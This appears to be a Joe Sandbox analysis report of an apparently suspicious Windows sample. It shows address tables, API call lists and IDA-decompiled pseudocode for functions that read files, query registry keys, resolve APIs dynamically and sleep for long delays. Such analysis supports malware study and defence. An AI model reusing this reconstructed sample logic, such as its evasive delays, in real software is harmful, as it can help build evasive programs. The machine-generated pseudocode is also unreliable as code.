    0x003a046c
    0x00000000
    0x00000000
    0x003a0474
    0x003a0474
    0x003a0477
    0x003a047c
    0x003a047e
    0x003a0483
    0x003a0485
    0x003a0491
    0x003a0491
    0x003a0493
    0x00000000
    0x003a0493
    0x003a0470
    0x003a0472
    0x00000000
    0x00000000
    0x00000000
    0x003a0472
    0x00000000
    0x003a0370
    0x003a02d2
    0x003a02d9
    0x00000000
    0x00000000
    0x003a02df
    0x003a02e4
    0x003a02e9
    0x003a02eb
    0x003a02fc
    0x003a02ff
    0x003a0301
    0x003a0310
    0x003a0310
    0x003a0310
    0x003a0316
    0x003a0318
    0x00000000
    0x00000000
    0x003a031a
    0x003a032b
    0x003a032d
    0x003a032e
    0x003a0330
    0x00000000
    0x00000000
    0x00000000
    0x003a0330
    0x00000000
    0x003a0310
    0x003a0303
    0x003a0303
    0x003a0303
    0x003a0304
    0x003a0307
    0x00000000
    0x003a0307
    0x003a02ed
    0x003a02ed
    0x003a02f0
    0x00000000
    0x003a02f0
    0x003a01e2
    0x003a01f0
    0x003a01fb
    0x003a0201
    0x003a0206
    0x003a0208
    0x003a020a
    0x003a0245
    0x003a0246
    0x003a0254
    0x003a025f
    0x003a0260
    0x003a0266
    0x003a0267
    0x003a026f
    0x003a020c
    0x003a0212
    0x003a0213
    0x003a0221
    0x003a0226
    0x003a022c
    0x003a0233
    0x003a0234
    0x003a023c
    0x003a023c
    0x003a0270
    0x003a0279
    0x003a0280
    0x003a0286
    0x003a0289
    0x003a028c
    0x00000000
    0x003a028c
    0x003a01e4
    0x003a01ea
    0x00000000
    0x00000000
    0x00000000
    0x003a01ea
    0x003a017a
    0x003a0183
    0x003a018c
    0x003a0194
    0x003a0194
    0x003a0197
    0x003a0199
    0x003a019d
    0x003a01a0
    0x00000000
    0x00000000
    0x003a01a2
    0x003a01ab
    0x003a01bd
    0x003a01c0
    0x003a01c3
    0x003a01c8
    0x003a01cb
    0x003a01cd
    0x003a0354
    0x003a0359
    0x003a035b
    0x00000000
    0x00000000
    0x003a035d
    0x00000000
    0x003a035d
    0x00000000
    0x003a01cd
    0x003a01a4
    0x003a01a9
    0x00000000
    0x00000000
    0x00000000
    0x003a01a9
    0x003a017c
    0x003a0181
    0x00000000
    0x00000000
    0x00000000
    0x003a0181
    0x003a011d
    0x003a011d
    0x003a0122
    0x003a0125
    0x003a0128
    0x00000000
    0x00000000
    0x003a012a
    0x00000000
    0x00000000
    0x003a012c
    0x003a0131
    0x00000000
    0x00000000
    0x00000000
    0x003a0332
    0x003a0335
    0x003a0336
    0x003a0339
    0x003a0339
    0x00000000
    0x003a0342
    0x003a0014
    0x003a001d
    0x003a002b
    0x003a0030
    0x003a0033
    0x003a0035
    0x00000000
    0x00000000
    0x003a003b
    0x003a003e
    0x00000000
    0x003a003e
    0x003a0016
    0x003a001b
    0x00000000
    0x00000000
    0x00000000
    0x003a001b
    0x0039ffc9
    0x0039ffcc
    0x0039ffd6
    0x0039ffdb
    0x0039ffdb
    0x0039ffde
    0x0039ffef
    0x00000000
    0x0039ffef
    0x0039ff40
    0x0039ff49
    0x0039ff58
    0x0039ff5d
    0x0039ff60
    0x0039ff62
    0x0039ff96
    0x0039ff99
    0x0039ff9f
    0x0039ffa2
    0x0039ffa8
    0x00000000
    0x0039ffa8
    0x0039ff64
    0x0039ff67
    0x0039ff71
    0x0039ff76
    0x0039ff76
    0x0039ff79
    0x0039ff89
    0x00000000
    0x0039ff89
    0x0039ff42
    0x0039ff47
    0x00000000
    0x00000000
    0x00000000
    0x0039ff47
    0x0039fefd
    0x0039ff0e
    0x003a0374
    0x003a0374
    0x003a037a
    0x003a0380
    0x003a0381
    0x003a0387
    0x003a0387
    0x003a0390
    0x003a039b
    0x003a03a0
    0x003a03a3
    0x003a03a5
    0x003a03ab
    0x003a03ae
    0x003a03bf
    0x003a03c4
    0x003a03c4
    0x003a03ae
    0x003a03a5
    0x0039fec0
    0x0039fe74
    0x0039fe34
    0x0039fe37
    0x0039fe42
    0x0039fe4a
    0x00000000

    APIs
    • ??3@YAXPAX@Z.MSVCRT ref: 0039FD71
      • Part of subcall function 00391B20: memset.MSVCRT ref: 00391B53
      • Part of subcall function 00391B20: memset.MSVCRT ref: 00391B62
      • Part of subcall function 00391B20: ??2@YAPAXI@Z.MSVCRT ref: 00391B79
      • Part of subcall function 00391B20: ??2@YAPAXI@Z.MSVCRT ref: 00391B98
    • ??2@YAPAXI@Z.MSVCRT ref: 0039FDC4
      • Part of subcall function 00391F00: memcpy.MSVCRT ref: 00391F9C
      • Part of subcall function 003969F0: ??2@YAPAXI@Z.MSVCRT ref: 00396A09
      • Part of subcall function 003969F0: ??2@YAPAXI@Z.MSVCRT ref: 00396A24
      • Part of subcall function 003969F0: ??3@YAXPAX@Z.MSVCRT ref: 00396ADA
      • Part of subcall function 003969F0: ??3@YAXPAX@Z.MSVCRT ref: 00396B34
      • Part of subcall function 003969F0: ??3@YAXPAX@Z.MSVCRT ref: 00396B88
      • Part of subcall function 003969F0: ??3@YAXPAX@Z.MSVCRT ref: 00396C0A
      • Part of subcall function 003969F0: ??3@YAXPAX@Z.MSVCRT ref: 00396C1E
      • Part of subcall function 0039F850: ??3@YAXPAX@Z.MSVCRT ref: 0039F90D
      • Part of subcall function 0039F850: ??3@YAXPAX@Z.MSVCRT ref: 0039F924
      • Part of subcall function 0039F850: ??3@YAXPAX@Z.MSVCRT ref: 0039F955
    • ExitProcess.KERNEL32 ref: 003A04F6
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00391FE0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113
    C-Code - Quality: 78%
    			E00391FE0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v8;
				char _v12;
				signed int _v16;
				char _v20;
				void* _t34;
				void* _t39;
				intOrPtr _t41;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr* _t55;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr* _t70;
				intOrPtr* _t72;
				signed int _t75;
				signed int _t77;
				void* _t78;
				void* _t79;

				_t72 = _a12;
				_t53 =  *_t72;
				_t75 = 0;
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t34 = E00395A10(_a8, 0x17,  *((intOrPtr*)(_t53 + 0x10)),  &_v8,  &_v12,  &_v20, __edi, __esi); // executed
				_t79 = _t78 + 0x18;
				if(_t34 == 0) {
					L13:
					_t35 = _v8;
					if(_v8 != 0) {
						E0039BB40(_t35);
					}
					return _v16;
				}
				_push(0x34);
				L0039A47E();
				_t79 = _t79 + 4;
				if(_t34 != 0) {
					_t75 = E003970B0(_t34);
				}
				_t39 = E00399020(_t75, _a4, _v8, _v12); // executed
				if(_t39 == 0) {
					L11:
					__eflags = _t75;
					if(_t75 != 0) {
						E0039CB70(_t53, _t75, _t72);
						_push(_t75);
						L00391CB0();
						_t79 = _t79 + 4;
					}
				} else {
					_t41 =  *((intOrPtr*)(_t75 + 0x10));
					if(_t41 != _v20) {
						goto L11;
					}
					_t86 = _t41 -  *((intOrPtr*)(_t53 + 0x10));
					if(_t41 <=  *((intOrPtr*)(_t53 + 0x10))) {
						goto L11;
					}
					E003B0900(_t53, _v8, _v12); // executed
					E00392150(_t86, _t75);
					_t61 =  *0x3b8628; // 0x593938
					_t70 =  *((intOrPtr*)(_t61 + 0xac));
					_v16 = 1;
					 *_t70(0x3b8594);
					E0039CB70(_t53, _t53, _t72);
					L00391CB0();
					 *_t72 = _t75;
					_t47 =  *0x3b8628; // 0x593938
					_t79 = _t79 + 0x10;
					 *((intOrPtr*)( *((intOrPtr*)(_t47 + 0xc4))))(0x3b8594, _t53);
					_t49 =  *_t72;
					if(_t49 == 0) {
						goto L13;
					}
					_t77 = 0;
					if( *((intOrPtr*)(_t49 + 0x18)) <= 0) {
						goto L13;
					}
					_t55 = __imp___time64;
					do {
						_t50 =  *_t55(0);
						_t65 =  *((intOrPtr*)( *_t72 + 0x28));
						 *((intOrPtr*)(_t65 + _t77 * 8)) = _t50;
						 *((intOrPtr*)(_t65 + 4 + _t77 * 8)) = _t70;
						_t70 =  *_t72;
						_t77 = _t77 + 1;
						_t79 = _t79 + 4;
					} while (_t77 <  *((intOrPtr*)(_t70 + 0x18)));
				}
			}























    0x00391fe9
    0x00391fec
    0x00391ff2
    0x00391fff
    0x00392002
    0x00392005
    0x0039200f
    0x00392012
    0x00392017
    0x0039201c
    0x00392101
    0x00392101
    0x00392109
    0x0039210c
    0x00392111
    0x0039211a
    0x0039211a
    0x00392022
    0x00392024
    0x00392029
    0x0039202e
    0x00392037
    0x00392037
    0x00392047
    0x0039204e
    0x003920ed
    0x003920ed
    0x003920ef
    0x003920f3
    0x003920f8
    0x003920f9
    0x003920fe
    0x003920fe
    0x00392054
    0x00392054
    0x0039205a
    0x00000000
    0x00000000
    0x00392060
    0x00392063
    0x00000000
    0x00000000
    0x00392071
    0x00392077
    0x0039207c
    0x00392082
    0x00392090
    0x00392097
    0x0039209b
    0x003920a1
    0x003920a6
    0x003920a8
    0x003920b3
    0x003920bb
    0x003920bd
    0x003920c1
    0x00000000
    0x00000000
    0x003920c3
    0x003920c8
    0x00000000
    0x00000000
    0x003920ca
    0x003920d0
    0x003920d2
    0x003920d6
    0x003920d9
    0x003920dc
    0x003920e0
    0x003920e2
    0x003920e3
    0x003920e6
    0x003920eb

    APIs
      • Part of subcall function 00395A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,0039FE81), ref: 00395ABF
      • Part of subcall function 00395A10: Sleep.KERNELBASE(00004E20,00000000,0039FE81,757DC426,00000000,00000000,?,?,00000000,0039FE81), ref: 00395B3E
    • ??2@YAPAXI@Z.MSVCRT ref: 00392024
    • ??3@YAXPAX@Z.MSVCRT ref: 003920A1
    • _time64.MSVCRT ref: 003920D2
      • Part of subcall function 0039CB70: SysFreeString.OLEAUT32(?), ref: 0039CB81
    • ??3@YAXPAX@Z.MSVCRT ref: 003920F9
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00391050, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91file
    C-Code - Quality: 100%
    			E00391050(void* __ecx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				long _v8;
				long _v12;
				void* __edi;
				void* _t20;
				int _t30;
				void* _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t49;
				void* _t50;
				void* _t51;

				_t49 = 0;
				_t34 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_t20 = CreateFileW(_a8, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t50 = _t20;
				if(_t50 != 0xffffffff) {
					_v8 = SetFilePointer(_t50, 0, 0, 2);
					SetFilePointer(_t50, 0, 0, 0); // executed
					_t49 = E003A1D90(_v8, 0);
					_t51 = _t51 + 8;
					if(_t49 != 0) {
						_t30 = ReadFile(_t50, _t49, _v8,  &_v8, 0); // executed
						if(_t30 != 0) {
							_t33 = E003968A0(_t34, _t49, _a4, _t49, _v8, _a12, _a16); // executed
							if(_t33 != 0) {
								_v12 = 1;
							}
						}
					}
				}
				if(_t50 != 0) {
					_t37 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t37 + 0xf8))))(_t50);
				}
				if(_t49 != 0) {
					E0039BB40(_t49);
				}
				return _v12;
			}














    0x0039105c
    0x00391069
    0x00391076
    0x00391080
    0x00391083
    0x00391085
    0x0039108a
    0x003910a7
    0x003910b1
    0x003910bd
    0x003910bf
    0x003910c4
    0x003910de
    0x003910e2
    0x003910f7
    0x003910fe
    0x00391100
    0x00391100
    0x003910fe
    0x003910e2
    0x003910c4
    0x00391109
    0x0039110b
    0x00391118
    0x00391118
    0x0039111c
    0x0039111f
    0x00391124
    0x00391130

    APIs
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?), ref: 00391083
    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002), ref: 0039109C
    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000), ref: 003910B1
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 003910DE
      • Part of subcall function 003968A0: memcpy.MSVCRT ref: 00396998
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00393C70, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83file
    C-Code - Quality: 100%
    			E00393C70(void* __ecx, WCHAR* _a4, void** _a8, long* _a12) {
				long _v8;
				void* _t17;
				int _t29;
				long _t32;
				intOrPtr _t43;
				void* _t46;
				void* _t49;

				_t32 = 0;
				_v8 = 0;
				_t49 = 0; // executed
				_t17 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t46 = _t17;
				if(_t46 != 0xffffffff) {
					_v8 = SetFilePointer(_t46, 0, 0, 2);
					SetFilePointer(_t46, 0, 0, 0); // executed
					_t24 = _v8;
					if(_v8 != 0) {
						_t49 = E003A1D90(_t24, 0);
						if(_t49 != 0) {
							_t29 = ReadFile(_t46, _t49, _v8,  &_v8, 0); // executed
							if(_t29 != 0) {
								goto L2;
							} else {
								E0039BB40(_t49);
								_t49 = 0;
								_v8 = 0;
							}
						}
					} else {
						L2:
						_t32 = 1;
					}
					_t43 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t43 + 0xf8))))(_t46);
				}
				 *_a8 = _t49;
				 *_a12 = _v8;
				return _t32;
			}










    0x00393c80
    0x00393c92
    0x00393c9c
    0x00393c9e
    0x00393ca0
    0x00393ca5
    0x00393cc6
    0x00393cd0
    0x00393cd2
    0x00393cd7
    0x00393ce8
    0x00393cef
    0x00393d08
    0x00393d0c
    0x00000000
    0x00393d0e
    0x00393d0f
    0x00393d17
    0x00393d19
    0x00393d19
    0x00393d0c
    0x00393cd9
    0x00393cd9
    0x00393cd9
    0x00393cd9
    0x00393d1c
    0x00393d29
    0x00393d29
    0x00393d35
    0x00393d37
    0x00393d40

    APIs
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?,?,?,003A14F1,?,00391BCA,?), ref: 00393C9E
    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,003A14F1,?,00391BCA,?,?,000000B3,00000000,?,?), ref: 00393CBB
    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,003A14F1,?,00391BCA,?,?,000000B3,00000000,?,?), ref: 00393CD0
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?), ref: 00393D08
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039CEA0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69registrystring
    C-Code - Quality: 100%
    			E0039CEA0(void* _a4, short* _a8) {
				long _t16;
				long _t21;
				void* _t24;
				intOrPtr _t28;
				void* _t34;
				short* _t36;

				_t34 = _a4;
				if(_t34 != 0) {
					_t36 = _a8;
					if(_t36 == 0 || lstrlenW(_t36) == 0) {
						return 0;
					} else {
						RegOpenKeyExW(_t34, _t36, 0, 0x20119,  &_a4);
						_t16 = RegOpenKeyExW(_t34, _t36, 0, 0x20119,  &_a4); // executed
						if(_t16 == 2) {
							L7:
							_t24 = 0;
						} else {
							_t21 = RegOpenKeyExW(_t34, _t36, 0, 0x20119,  &_a4); // executed
							if(_t21 != 0) {
								goto L7;
							} else {
								_t24 = 1;
							}
						}
						_t28 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t28 + 0x198))))(_a4);
						return _t24;
					}
				} else {
					return 0;
				}
			}









    0x0039cea4
    0x0039cea9
    0x0039ceb1
    0x0039ceb6
    0x0039cf46
    0x0039cec7
    0x0039cee1
    0x0039cefc
    0x0039cf01
    0x0039cf26
    0x0039cf26
    0x0039cf03
    0x0039cf1c
    0x0039cf20
    0x00000000
    0x0039cf22
    0x0039cf22
    0x0039cf22
    0x0039cf20
    0x0039cf2b
    0x0039cf38
    0x0039cf40
    0x0039cf40
    0x0039ceab
    0x0039ceaf
    0x0039ceaf

    APIs
    • lstrlenW.KERNEL32(?,?,?,?,003997FA,?,?), ref: 0039CEBD
    • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003997FA,?,?), ref: 0039CEE1
    • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003997FA,?,?), ref: 0039CEFC
    • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003997FA,?,?), ref: 0039CF1C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00398880, Relevance: 8.1, APIs: 3, Strings: 2, Instructions: 576
    C-Code - Quality: 91%
    			E00398880(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				int _v8;
				int _v12;
				intOrPtr* _v16;
				char _v20;
				int _v24;
				char _v28;
				char _v32;
				int _v36;
				void* _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v56;
				char _v60;
				int _v64;
				int _v68;
				char _v268;
				char _v468;
				void _v596;
				char _v984;
				void _v2008;
				intOrPtr _t167;
				intOrPtr _t168;
				int _t169;
				void* _t173;
				intOrPtr _t186;
				intOrPtr _t188;
				signed int* _t191;
				signed int* _t196;
				signed int* _t198;
				intOrPtr _t202;
				intOrPtr _t206;
				signed int* _t207;
				signed int* _t208;
				signed int* _t209;
				signed int* _t211;
				signed int* _t217;
				signed int* _t218;
				signed int* _t220;
				int _t224;
				signed int* _t228;
				int _t233;
				int _t237;
				signed int* _t239;
				signed int* _t240;
				signed int* _t241;
				signed int* _t247;
				signed int* _t250;
				signed int* _t252;
				signed int* _t253;
				signed int* _t259;
				signed int* _t260;
				intOrPtr _t261;
				signed int** _t266;
				void* _t271;
				intOrPtr* _t282;
				intOrPtr _t285;
				signed int* _t292;
				signed int* _t316;
				signed int _t319;
				intOrPtr* _t331;
				signed int* _t335;
				signed int* _t359;
				intOrPtr _t367;
				signed int* _t369;
				intOrPtr _t378;
				signed int _t383;
				signed int* _t386;
				signed int* _t387;
				void* _t388;
				void* _t389;
				void* _t390;
				void* _t392;
				void* _t394;
				void* _t395;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t271 = __ecx;
				_v12 = 0;
				_v16 = 0;
				_v40 = 0;
				_v8 = 0;
				_v36 = 0;
				_v56 = 0;
				_v32 = 0;
				_v60 = 0;
				_v20 = 0;
				_v68 = 0;
				_v28 = 0;
				_v44 = 0;
				_v64 = 0;
				_v52 = 0;
				_v48 = 0;
				memset( &_v596, 0, 0x80);
				memset( &_v2008, 0, 0x400);
				_t167 =  *((intOrPtr*)(_t271 + 0x54));
				_t389 = _t388 + 0x18;
				 *(_t271 + 0x4ec) = 0;
				 *(_t271 + 0x38) = 1;
				_t396 = _t167;
				if(_t167 != 0) {
					_t168 = E00397B80(_t167, 0x3b3314,  &_v40, 0xffffffff);
					_t23 = _t168 - 2; // -2
					_t389 = _t389 + 0x10;
					_v68 = _t168;
					__eflags = _t23 - 1;
					if(__eflags > 0) {
						_push(0x36);
						goto L84;
					}
					_t282 = _v40;
					_t385 =  *((intOrPtr*)(_t282 + 4));
					_v12 =  *_t282;
					_v16 =  *((intOrPtr*)(_t282 + 4));
					__eflags = _t168 - 3;
					if(_t168 != 3) {
						L12:
						_t191 = E00397E20(_t385, 0,  &_v60, 0xffffffff);
						_t389 = _t389 + 0x10;
						__eflags = _t191;
						if(__eflags != 0) {
							_t386 = E0039CA00( *((intOrPtr*)(_t271 + 4)), __eflags, _v12);
							E00399090(__eflags,  &_v268, 0x39);
							_t285 =  *0x3b8628; // 0x593938
							_t394 = _t389 + 8;
							_t196 =  *((intOrPtr*)( *((intOrPtr*)(_t285 + 0xe0))))(_v16,  &_v268);
							__eflags = _t196;
							if(_t196 != 0) {
								L25:
								__eflags = _t386;
								if(__eflags != 0) {
									L34:
									_t198 = E00397E20(_t386[4], 0,  &_v32, 0xffffffff);
									_t389 = _t394 + 0x10;
									__eflags = _t198;
									if(__eflags != 0) {
										__eflags = E0039A270(_t271,  *((intOrPtr*)(_t271 + 4)), 0, _t386, _t386,  &_v984);
										if(__eflags != 0) {
											E00399090(__eflags,  &_v268, 0x39);
											_t202 =  *0x3b8628; // 0x593938
											_t390 = _t389 + 8;
											__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xe0))))(_v16,  &_v268);
											if(__eflags != 0) {
												E00399090(__eflags,  &_v268, 0x3e);
												_t206 =  *0x3b8628; // 0x593938
												_t389 = _t390 + 8;
												_t207 =  *((intOrPtr*)( *((intOrPtr*)(_t206 + 0xe0))))(_v16,  &_v268);
												_t292 = _t386;
												__eflags = _t207;
												if(_t207 != 0) {
													_t208 = E0039CB60(_t292);
													__eflags = _t208;
													if(_t208 == 0) {
														L69:
														_t209 = E0039F050(_t386);
														__eflags = _t209;
														if(_t209 == 0) {
															E003967E0(_t386);
														}
														_t211 = E00397070(_t386,  &_v468);
														__eflags = _t211;
														if(_t211 != 0) {
															_push(0);
															_push(0);
															_push(0);
															__eflags = E00391CC0(_t386, _v32, _v20, _v28,  &_v2008,  &_v984);
															if(__eflags != 0) {
																L75:
																_push(0);
																_t217 = E003A0500(_t386, 0, _t386[0x10], _v60, _v20, _v28,  &_v2008,  &_v36,  &_v44,  &_v596); // executed
																__eflags = _t217;
																if(__eflags != 0) {
																	_t218 =  *(_t271 + 0x64);
																	__eflags = _t218;
																	if(_t218 != 0) {
																		E0039BB40(_t218);
																		_t389 = _t389 + 4;
																		 *(_t271 + 0x64) = 0;
																	}
																	_t220 = E003A1D90(_v44, 0);
																	_t395 = _t389 + 8;
																	_v56 = _t220;
																	__eflags = _t220;
																	if(__eflags != 0) {
																		memcpy(_v56, _v36, _v44);
																		_t390 = _t395 + 0xc;
																		E00397AF0(_t271, _t386, _v36); // executed
																		L82:
																		 *(_t271 + 0x4ec) = 1;
																		_v64 = 1;
																	} else {
																		_t224 = E00391C70(__eflags, 0x37);
																		_t390 = _t395 + 4;
																		_v8 = _t224;
																		E00397AF0(_t271, _t386, _v36);
																	}
																	goto L86;
																}
																_push(0x42);
																goto L84;
															}
															_push(0x3d);
															goto L84;
														} else {
															_t169 = E003966C0( &_v468);
															goto L85;
														}
													}
													_t228 = E0039F050(_t386);
													__eflags = _t228;
													if(_t228 != 0) {
														goto L75;
													}
													goto L69;
												}
												__eflags = E0039CB60(_t292);
												if(__eflags != 0) {
													__eflags = E0039F050(_t386);
													if(__eflags != 0) {
														E00391680(_t386, _t386[0x10]);
														E00393040( *((intOrPtr*)(_t271 + 4)), __eflags, _v12);
														goto L82;
													}
													_t233 = E00391C70(__eflags, 0x3f);
													_t390 = _t389 + 4;
													_v8 = _t233;
													E003967E0(_t386);
													E00393040( *((intOrPtr*)(_t271 + 4)), __eflags, _v12);
													goto L86;
												}
												_t237 = E00391C70(__eflags, 0x43);
												_t390 = _t389 + 4;
												_v8 = _t237;
												E00393040( *((intOrPtr*)(_t271 + 4)), __eflags, _v12);
												goto L86;
											}
											_t239 = E0039CB60(_t386);
											_t316 = _t386;
											__eflags = _t239;
											if(_t239 != 0) {
												_t240 = E0039F050(_t316);
												__eflags = _t240;
												if(_t240 != 0) {
													__eflags = _v48;
													if(_v48 != 0) {
														_t241 = E003A1D90(0x400, 0);
														_t390 = _t390 + 8;
														_v8 = _t241;
														_t387 = 0x200;
														_v24 = 0;
														_t359 = _v12 - _t241;
														__eflags = _t359;
														while(1) {
															_t86 =  &(_t387[0x1fffff7f]); // 0x7ffffffe
															__eflags = _t86;
															if(_t86 == 0) {
																break;
															}
															_t319 =  *(_t359 + _t241) & 0x0000ffff;
															__eflags = _t319;
															if(_t319 == 0) {
																break;
															}
															 *_t241 = _t319;
															_t241 =  &(_t241[0]);
															_t387 = _t387 - 1;
															__eflags = _t387;
															if(_t387 != 0) {
																continue;
															}
															L58:
															_t241 = _t241 - 2;
															__eflags = _t241;
															_v24 = 0x8007007a;
															L59:
															 *_t241 = 0;
															__eflags = _v24;
															if(__eflags >= 0) {
																E00399090(__eflags,  &_v268, 0xc5);
																_t390 = _t390 + 8;
																E003A1C50(_v8, 0x200,  &_v268);
															}
															goto L86;
														}
														__eflags = _t387;
														if(_t387 != 0) {
															goto L59;
														}
														goto L58;
													}
													E003967E0(_t386);
													_t247 = E00397070(_t386,  &_v468);
													__eflags = _t247;
													if(_t247 != 0) {
														L50:
														_push(0);
														_push(0);
														_push(0);
														_t250 = E00391CC0(_t386, _v32, _v20, _v28,  &_v2008,  &_v984); // executed
														__eflags = _t250;
														if(__eflags != 0) {
															goto L82;
														}
														_push(0x3d);
														goto L84;
													}
